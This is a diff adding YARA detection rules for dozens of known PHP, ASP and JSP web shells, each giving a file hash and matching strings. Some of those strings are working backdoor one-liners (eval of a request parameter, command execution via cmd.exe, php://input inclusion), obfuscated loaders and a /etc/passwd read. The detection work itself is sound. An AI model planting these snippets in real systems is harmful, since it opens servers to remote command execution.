+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "35fb37f3c806718545d97c6559abd262"
+ strings:
+ $s0 = "style=\"BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in"
+ $s4 = "<font color=\"#858585\">SHOPEN</font></a></font><font face=\"Verdana\" style"
+ condition:
+ 1 of them
+}
+rule webshell_caidao_shell_ice {
+ meta:
+ description = "Web Shell - file ice.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "6560b436d3d3bb75e2ef3f032151d139"
+ strings:
+ $s0 = "<%eval request(\"ice\")%>" fullword
+ condition:
+ all of them
+}
+rule webshell_cihshell_fix {
+ meta:
+ description = "Web Shell - file cihshell_fix.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "3823ac218032549b86ee7c26f10c4cb5"
+ strings:
+ $s7 = "<tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty"
+ $s8 = "if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos"
+ condition:
+ 1 of them
+}
+rule webshell_asp_shell {
+ meta:
+ description = "Web Shell - file shell.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "e63f5a96570e1faf4c7b8ca6df750237"
+ strings:
+ $s7 = "<input type=\"submit\" name=\"Send\" value=\"GO!\">" fullword
+ $s8 = "<TEXTAREA NAME=\"1988\" ROWS=\"18\" COLS=\"78\"></TEXTAREA>" fullword
+ condition:
+ all of them
+}
+rule webshell_Private_i3lue {
+ meta:
+ description = "Web Shell - file Private-i3lue.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "13f5c7a035ecce5f9f380967cf9d4e92"
+ strings:
+ $s8 = "case 15: $image .= \"\\21\\0\\"
+ condition:
+ all of them
+}
+rule webshell_php_up {
+ meta:
+ description = "Web Shell - file up.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "7edefb8bd0876c41906f4b39b52cd0ef"
+ strings:
+ $s0 = "copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);" fullword
+ $s3 = "if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {" fullword
+ $s8 = "echo \"Uploaded file: \" . $HTTP_POST_FILES['userfile']['name'];" fullword
+ condition:
+ 2 of them
+}
+rule webshell_Mysql_interface_v1_0 {
+ meta:
+ description = "Web Shell - file Mysql interface v1.0.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "a12fc0a3d31e2f89727b9678148cd487"
+ strings:
+ $s0 = "echo \"<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\\\"return"
+ condition:
+ all of them
+}
+rule webshell_php_s_u {
+ meta:
+ description = "Web Shell - file s-u.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "efc7ba1a4023bcf40f5e912f1dd85b5a"
+ strings:
+ $s6 = "<a href=\"?act=do\"><font color=\"red\">Go Execute</font></a></b><br /><textarea"
+ condition:
+ all of them
+}
+rule webshell_phpshell_2_1_config {
+ meta:
+ description = "Web Shell - file config.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "bd83144a649c5cc21ac41b505a36a8f3"
+ strings:
+ $s1 = "; (choose good passwords!). Add uses as simple 'username = \"password\"' lines." fullword
+ condition:
+ all of them
+}
+rule webshell_asp_EFSO_2 {
+ meta:
+ description = "Web Shell - file EFSO_2.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "a341270f9ebd01320a7490c12cb2e64c"
+ strings:
+ $s0 = "%8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB"
+ condition:
+ all of them
+}
+rule webshell_jsp_up {
+ meta:
+ description = "Web Shell - file up.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "515a5dd86fe48f673b72422cccf5a585"
+ strings:
+ $s9 = "// BUG: Corta el fichero si es mayor de 640Ks" fullword
+ condition:
+ all of them
+}
+rule webshell_NetworkFileManagerPHP {
+ meta:
+ description = "Web Shell - file NetworkFileManagerPHP.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "acdbba993a5a4186fd864c5e4ea0ba4f"
+ strings:
+ $s9 = " echo \"<br><center>All the data in these tables:<br> \".$tblsv.\" were putted "
+ condition:
+ all of them
+}
+rule webshell_Server_Variables {
+ meta:
+ description = "Web Shell - file Server Variables.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "47fb8a647e441488b30f92b4d39003d7"
+ strings:
+ $s7 = "<% For Each Vars In Request.ServerVariables %>" fullword
+ $s9 = "Variable Name</B></font></p>" fullword
+ condition:
+ all of them
+}
+rule webshell_caidao_shell_ice_2 {
+ meta:
+ description = "Web Shell - file ice.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "1d6335247f58e0a5b03e17977888f5f2"
+ strings:
+ $s0 = "<?php ${${eval($_POST[ice])}};?>" fullword
+ condition:
+ all of them
+}
+rule webshell_caidao_shell_mdb {
+ meta:
+ description = "Web Shell - file mdb.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "fbf3847acef4844f3a0d04230f6b9ff9"
+ strings:
+ $s1 = "<% execute request(\"ice\")%>a " fullword
+ condition:
+ all of them
+}
+rule webshell_jsp_guige {
+ meta:
+ description = "Web Shell - file guige.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "2c9f2dafa06332957127e2c713aacdd2"
+ strings:
+ $s0 = "if(damapath!=null &&!damapath.equals(\"\")&&content!=null"
+ condition:
+ all of them
+}
+rule webshell_phpspy2010 {
+ meta:
+ description = "Web Shell - file phpspy2010.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "14ae0e4f5349924a5047fed9f3b105c5"
+ strings:
+ $s3 = "eval(gzinflate(base64_decode("
+ $s5 = "//angel" fullword
+ $s8 = "$admin['cookiedomain'] = '';" fullword
+ condition:
+ all of them
+}
+rule webshell_asp_ice {
+ meta:
+ description = "Web Shell - file ice.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "d141e011a92f48da72728c35f1934a2b"
+ strings:
+ $s0 = "D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC"
+ condition:
+ all of them
+}
+rule webshell_drag_system {
+ meta:
+ description = "Web Shell - file system.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "15ae237cf395fb24cf12bff141fb3f7c"
+ strings:
+ $s9 = "String sql = \"SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_"
+ condition:
+ all of them
+}
+rule webshell_DarkBlade1_3_asp_indexx {
+ meta:
+ description = "Web Shell - file indexx.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "b7f46693648f534c2ca78e3f21685707"
+ strings:
+ $s3 = "Const strs_toTransform=\"command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou"
+ condition:
+ all of them
+}
+rule webshell_phpshell3 {
+ meta:
+ description = "Web Shell - file phpshell3.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "76117b2ee4a7ac06832d50b2d04070b8"
+ strings:
+ $s2 = "<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_SESSION['nounce'];"
+ $s5 = "<p>Username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna"
+ $s7 = "$_SESSION['output'] .= \"cd: could not change to: $new_dir\\n\";" fullword
+ condition:
+ 2 of them
+}
+rule webshell_jsp_hsxa {
+ meta:
+ description = "Web Shell - file hsxa.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "d0e05f9c9b8e0b3fa11f57d9ab800380"
+ strings:
+ $s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja"
+ condition:
+ all of them
+}
+rule webshell_jsp_utils {
+ meta:
+ description = "Web Shell - file utils.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "9827ba2e8329075358b8e8a53e20d545"
+ strings:
+ $s0 = "ResultSet r = c.getMetaData().getTables(null, null, \"%\", t);" fullword
+ $s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
+ condition:
+ all of them
+}
+rule webshell_asp_01 {
+ meta:
+ description = "Web Shell - file 01.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 50
+ hash = "61a687b0bea0ef97224c7bd2df118b87"
+ strings:
+ $s0 = "<%eval request(\"pass\")%>" fullword
+ condition:
+ all of them
+}
+rule webshell_asp_404 {
+ meta:
+ description = "Web Shell - file 404.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "d9fa1e8513dbf59fa5d130f389032a2d"
+ strings:
+ $s0 = "lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2"
+ condition:
+ all of them
+}
+rule webshell_webshell_cnseay02_1 {
+ meta:
+ description = "Web Shell - file webshell-cnseay02-1.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "95fc76081a42c4f26912826cb1bd24b1"
+ strings:
+ $s0 = "(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU"
+ condition:
+ all of them
+}
+rule webshell_php_fbi {
+ meta:
+ description = "Web Shell - file fbi.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "1fb32f8e58c8deb168c06297a04a21f1"
+ strings:
+ $s7 = "erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo"
+ condition:
+ all of them
+}
+rule webshell_B374kPHP_B374k {
+ meta:
+ description = "Web Shell - file B374k.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "bed7388976f8f1d90422e8795dff1ea6"
+ strings:
+ $s0 = "Http://code.google.com/p/b374k-shell" fullword
+ $s1 = "$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'"
+ $s3 = "Jayalah Indonesiaku & Lyke @ 2013" fullword
+ $s4 = "B374k Vip In Beautify Just For Self" fullword
+ condition:
+ 1 of them
+}
+rule webshell_cmd_asp_5_1 {
+ meta:
+ description = "Web Shell - file cmd-asp-5.1.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "8baa99666bf3734cbdfdd10088e0cd9f"
+ strings:
+ $s9 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
+ condition:
+ all of them
+}
+rule webshell_php_dodo_zip {
+ meta:
+ description = "Web Shell - file zip.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "b7800364374077ce8864796240162ad5"
+ strings:
+ $s0 = "$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x"
+ $s3 = "$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
+ condition:
+ all of them
+}
+rule webshell_aZRaiLPhp_v1_0 {
+ meta:
+ description = "Web Shell - file aZRaiLPhp v1.0.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "26b2d3943395682e36da06ed493a3715"
+ strings:
+ $s5 = "echo \" <font color='#0000FF'>CHMODU \".substr(base_convert(@fileperms($"
+ $s7 = "echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo"
+ condition:
+ all of them
+}
+rule webshell_php_list {
+ meta:
+ description = "Web Shell - file list.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "922b128ddd90e1dc2f73088956c548ed"
+ strings:
+ $s1 = "// list.php = Directory & File Listing" fullword
+ $s2 = " echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena"
+ $s9 = "// by: The Dark Raver" fullword
+ condition:
+ 1 of them
+}
+rule webshell_ironshell {
+ meta:
+ description = "Web Shell - file ironshell.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "8bfa2eeb8a3ff6afc619258e39fded56"
+ strings:
+ $s4 = "print \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\""
+ $s8 = "print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di"
+ condition:
+ all of them
+}
+rule webshell_caidao_shell_404 {
+ meta:
+ description = "Web Shell - file 404.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "ee94952dc53d9a29bdf4ece54c7a7aa7"
+ strings:
+ $s0 = "<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St"
+ condition:
+ all of them
+}
+rule webshell_ASP_aspydrv {
+ meta:
+ description = "Web Shell - file aspydrv.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "de0a58f7d1e200d0b2c801a94ebce330"
+ strings:
+ $s3 = "<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi"
+ condition:
+ all of them
+}
+rule webshell_jsp_web {
+ meta:
+ description = "Web Shell - file web.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "4bc11e28f5dccd0c45a37f2b541b2e98"
+ strings:
+ $s0 = "<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%String t=request."
+ condition:
+ all of them
+}
+rule webshell_mysqlwebsh {
+ meta:
+ description = "Web Shell - file mysqlwebsh.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "babfa76d11943a22484b3837f105fada"
+ strings:
+ $s3 = " <TR><TD bgcolor=\"<? echo (!$CONNECT && $action == \"chparam\")?\"#660000\":\"#"
+ condition:
+ all of them
+}
+rule webshell_jspShell {
+ meta:
+ description = "Web Shell - file jspShell.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "0d5b5a17552254be6c1c8f1eb3a5fdc1"
+ strings:
+ $s0 = "<input type=\"checkbox\" name=\"autoUpdate\" value=\"AutoUpdate\" on"
+ $s1 = "onblur=\"document.shell.autoUpdate.checked= this.oldValue;"
+ condition:
+ all of them
+}
+rule webshell_Dx_Dx {
+ meta:
+ description = "Web Shell - file Dx.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
+ strings:
+ $s1 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+ $s9 = "class=linelisting><nobr>POST (php eval)</td><"
+ condition:
+ 1 of them
+}
+rule webshell_asp_ntdaddy {
+ meta:
+ description = "Web Shell - file ntdaddy.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "c5e6baa5d140f73b4e16a6cfde671c68"
+ strings:
+ $s9 = "if FP = \"RefreshFolder\" or "
+ $s10 = "request.form(\"cmdOption\")=\"DeleteFolder\" "
+ condition:
+ 1 of them
+}
+rule webshell_MySQL_Web_Interface_Version_0_8 {
+ meta:
+ description = "Web Shell - file MySQL Web Interface Version 0.8.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "36d4f34d0a22080f47bb1cb94107c60f"
+ strings:
+ $s2 = "href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>"
+ condition:
+ all of them
+}
+rule webshell_elmaliseker_2 {
+ meta:
+ description = "Web Shell - file elmaliseker.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "b32d1730d23a660fd6aa8e60c3dc549f"
+ strings:
+ $s1 = "<td<%if (FSO.GetExtensionName(path & \"\\\" & oFile.Name)=\"lnk\") or (FSO.GetEx"
+ $s6 = "<input type=button value=Save onclick=\"EditorCommand('Save')\"> <input type=but"
+ condition:
+ all of them
+}
+rule webshell_ASP_RemExp {
+ meta:
+ description = "Web Shell - file RemExp.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "aa1d8491f4e2894dbdb91eec1abc2244"
+ strings:
+ $s0 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Reques"
+ $s1 = "Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal"
+ condition:
+ all of them
+}
+rule webshell_jsp_list1 {
+ meta:
+ description = "Web Shell - file list1.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "8d9e5afa77303c9c01ff34ea4e7f6ca6"
+ strings:
+ $s1 = "case 's':ConnectionDBM(out,encodeChange(request.getParameter(\"drive"
+ $s9 = "return \"<a href=\\\"javascript:delFile('\"+folderReplace(file)+\"')\\\""
+ condition:
+ all of them
+}
+rule webshell_phpkit_1_0_odd {
+ meta:
+ description = "Web Shell - file odd.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "594d1b1311bbef38a0eb3d6cbb1ab538"
+ strings:
+ $s0 = "include('php://input');" fullword
+ $s1 = "// No eval() calls, no system() calls, nothing normally seen as malicious." fullword
+ $s2 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
+ condition:
+ all of them
+}
+rule webshell_jsp_123 {
+ meta:
+ description = "Web Shell - file 123.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "c691f53e849676cac68a38d692467641"
+ strings:
+ $s0 = "<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7"
+ $s3 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+ $s9 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\"> " fullword
+ condition:
+ all of them
+}
+rule webshell_asp_1 {
+ meta:
+ description = "Web Shell - file 1.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "8991148adf5de3b8322ec5d78cb01bdb"
+ strings:
+ $s4 = "!22222222222222222222222222222222222222222222222222" fullword
+ $s8 = "<%eval request(\"pass\")%>" fullword
+ condition:
+ all of them
+}
+rule webshell_ASP_tool {
+ meta:
+ description = "Web Shell - file tool.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "4ab68d38527d5834e9c1ff64407b34fb"
+ strings:
+ $s0 = "Response.Write \"<FORM action=\"\"\" & Request.ServerVariables(\"URL\") & \"\"\""
+ $s3 = "Response.Write \"<tr><td><font face='arial' size='2'><b><DIR> <a href='\" "
+ $s9 = "Response.Write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javas"
+ condition:
+ 2 of them
+}
+rule webshell_cmd_win32 {
+ meta:
+ description = "Web Shell - file cmd_win32.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "cc4d4d6cc9a25984aa9a7583c7def174"
+ strings:
+ $s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParam"
+ $s1 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
+ condition:
+ 2 of them
+}
+rule webshell_jsp_jshell {
+ meta:
+ description = "Web Shell - file jshell.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "124b22f38aaaf064cef14711b2602c06"
+ strings:
+ $s0 = "kXpeW[\"" fullword
+ $s4 = "[7b:g0W@W<" fullword
+ $s5 = "b:gHr,g<" fullword
+ $s8 = "RhV0W@W<" fullword
+ $s9 = "S_MR(u7b" fullword
+ condition:
+ all of them
+}
+rule webshell_ASP_zehir4 {
+ meta:
+ description = "Web Shell - file zehir4.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "7f4e12e159360743ec016273c3b9108c"
+ strings:
+ $s9 = "Response.Write \"<a href='\"&dosyaPath&\"?status=7&Path=\"&Path&\"/"
+ condition:
+ all of them
+}
+rule webshell_wsb_idc {
+ meta:
+ description = "Web Shell - file idc.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "7c5b1b30196c51f1accbffb80296395f"
+ strings:
+ $s1 = "if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)" fullword
+ $s3 = "{eval($_GET['idc']);}" fullword
+ condition:
+ 1 of them
+}
+rule webshell_cpg_143_incl_xpl {
+ meta:
+ description = "Web Shell - file cpg_143_incl_xpl.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "5937b131b67d8e0afdbd589251a5e176"
+ strings:
+ $s3 = "$data=\"username=\".urlencode($USER).\"&password=\".urlencode($PA"
+ $s5 = "fputs($sun_tzu,\"<?php echo \\\"Hi Master!\\\";ini_set(\\\"max_execution_time"
+ condition:
+ 1 of them
+}
+rule webshell_mumaasp_com {
+ meta:
+ description = "Web Shell - file mumaasp.com.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "cce32b2e18f5357c85b6d20f564ebd5d"
+ strings:
+ $s0 = "&9K_)P82ai,A}I92]R\"q!C:RZ}S6]=PaTTR"
+ condition:
+ all of them
+}
+rule webshell_php_404 {
+ meta:
+ description = "Web Shell - file 404.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "ced050df5ca42064056a7ad610a191b3"
+ strings:
+ $s0 = "$pass = md5(md5(md5($pass)));" fullword
+ condition:
+ all of them
+}
+rule webshell_webshell_cnseay_x {
+ meta:
+ description = "Web Shell - file webshell-cnseay-x.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "a0f9f7f5cd405a514a7f3be329f380e5"
+ strings:
+ $s9 = "$_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_"
+ condition:
+ all of them
+}
+rule webshell_asp_up {
+ meta:
+ description = "Web Shell - file up.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "f775e721cfe85019fe41c34f47c0d67c"
+ strings:
+ $s0 = "Pos = InstrB(BoundaryPos,RequestBin,getByteString(\"Content-Dispositio"
+ $s1 = "ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))" fullword
+ condition:
+ 1 of them
+}
+rule webshell_phpkit_0_1a_odd {
+ meta:
+ description = "Web Shell - file odd.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "3c30399e7480c09276f412271f60ed01"
+ strings:
+ $s1 = "include('php://input');" fullword
+ $s3 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
+ $s4 = "// uses include('php://input') to execute arbritary code" fullword
+ $s5 = "// php://input based backdoor" fullword
+ condition:
+ 2 of them
+}
+rule webshell_ASP_cmd {
+ meta:
+ description = "Web Shell - file cmd.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "97af88b478422067f23b001dd06d56a9"
+ strings:
+ $s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+ condition:
+ all of them
+}
+rule webshell_PHP_Shell_x3 {
+ meta:
+ description = "Web Shell - file PHP Shell.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
+ strings:
+ $s4 = " <?php echo buildUrl(\"<font color=\\\"navy\\\">["
+ $s6 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
+ $s9 = "if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset("
+ condition:
+ 2 of them
+}
+rule webshell_PHP_g00nv13 {
+ meta:
+ description = "Web Shell - file g00nv13.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "35ad2533192fe8a1a76c3276140db820"
+ strings:
+ $s1 = "case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": cas"
+ $s4 = "if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p"
+ condition:
+ all of them
+}
+rule webshell_php_h6ss {
+ meta:
+ description = "Web Shell - file h6ss.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "272dde9a4a7265d6c139287560328cd5"
+ strings:
+ $s0 = "<?php eval(gzuncompress(base64_decode(\""
+ condition:
+ all of them
+}
+rule webshell_jsp_zx {
+ meta:
+ description = "Web Shell - file zx.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "67627c264db1e54a4720bd6a64721674"
+ strings:
+ $s0 = "if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.g"
+ condition:
+ all of them
+}
+rule webshell_Ani_Shell {
+ meta:
+ description = "Web Shell - file Ani-Shell.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "889bfc9fbb8ee7832044fc575324d01a"
+ strings:
+ $s0 = "$Python_CODE = \"I"
+ $s6 = "$passwordPrompt = \"\\n================================================="
+ $s7 = "fputs ($sockfd ,\"\\n==============================================="
+ condition:
+ 1 of them
+}
+rule webshell_jsp_k8cmd {
+ meta:
+ description = "Web Shell - file k8cmd.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "b39544415e692a567455ff033a97a682"
+ strings:
+ $s2 = "if(request.getSession().getAttribute(\"hehe\").toString().equals(\"hehe\"))" fullword
+ condition:
+ all of them
+}
+rule webshell_jsp_cmd {
+ meta:
+ description = "Web Shell - file cmd.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "5391c4a8af1ede757ba9d28865e75853"
+ strings:
+ $s6 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword
+ condition:
+ all of them
+}
+rule webshell_jsp_k81 {
+ meta:
+ description = "Web Shell - file k81.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "41efc5c71b6885add9c1d516371bd6af"
+ strings:
+ $s1 = "byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);" fullword
+ $s9 = "if(cmd.equals(\"Szh0ZWFt\")){out.print(\"[S]\"+dir+\"[E]\");}" fullword
+ condition:
+ 1 of them
+}
+rule webshell_ASP_zehir {
+ meta:
+ description = "Web Shell - file zehir.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "0061d800aee63ccaf41d2d62ec15985d"
+ strings:
+ $s9 = "Response.Write \"<font face=wingdings size=3><a href='\"&dosyaPath&\"?status=18&"
+ condition:
+ all of them
+}
+rule webshell_Worse_Linux_Shell {
+ meta:
+ description = "Web Shell - file Worse Linux Shell.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "8338c8d9eab10bd38a7116eb534b5fa2"
+ strings:
+ $s0 = "system(\"mv \".$_FILES['_upl']['tmp_name'].\" \".$currentWD"
+ condition:
+ all of them
+}
+rule webshell_zacosmall {
+ meta:
+ description = "Web Shell - file zacosmall.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "5295ee8dc2f5fd416be442548d68f7a6"
+ strings:
+ $s0 = "if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr>"
+ condition:
+ all of them
+}
+rule webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit {
+ meta:
+ description = "Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
+ strings:
+ $s1 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
+ condition:
+ all of them
+}
+rule webshell_redirect {
+ meta:
+ description = "Web Shell - file redirect.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "97da83c6e3efbba98df270cc70beb8f8"
+ strings:
+ $s7 = "var flag = \"?txt=\" + (document.getElementById(\"dl\").checked ? \"2\":\"1\" "
+ condition:
+ all of them
+}
+rule webshell_jsp_cmdjsp {
+ meta:
+ description = "Web Shell - file cmdjsp.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "b815611cc39f17f05a73444d699341d4"
+ strings:
+ $s5 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
+ condition:
+ all of them
+}
+rule webshell_Java_Shell {
+ meta:
+ description = "Web Shell - file Java Shell.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "36403bc776eb12e8b7cc0eb47c8aac83"
+ strings:
+ $s4 = "public JythonShell(int columns, int rows, int scrollback) {" fullword
+ $s9 = "this(null, Py.getSystemState(), columns, rows, scrollback);" fullword
+ condition:
+ 1 of them
+}
+rule webshell_asp_1d {
+ meta:
+ description = "Web Shell - file 1d.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "fad7504ca8a55d4453e552621f81563c"
+ strings:
+ $s0 = "+9JkskOfKhUxZJPL~\\(mD^W~[,{@#@&EO"
+ condition:
+ all of them
+}
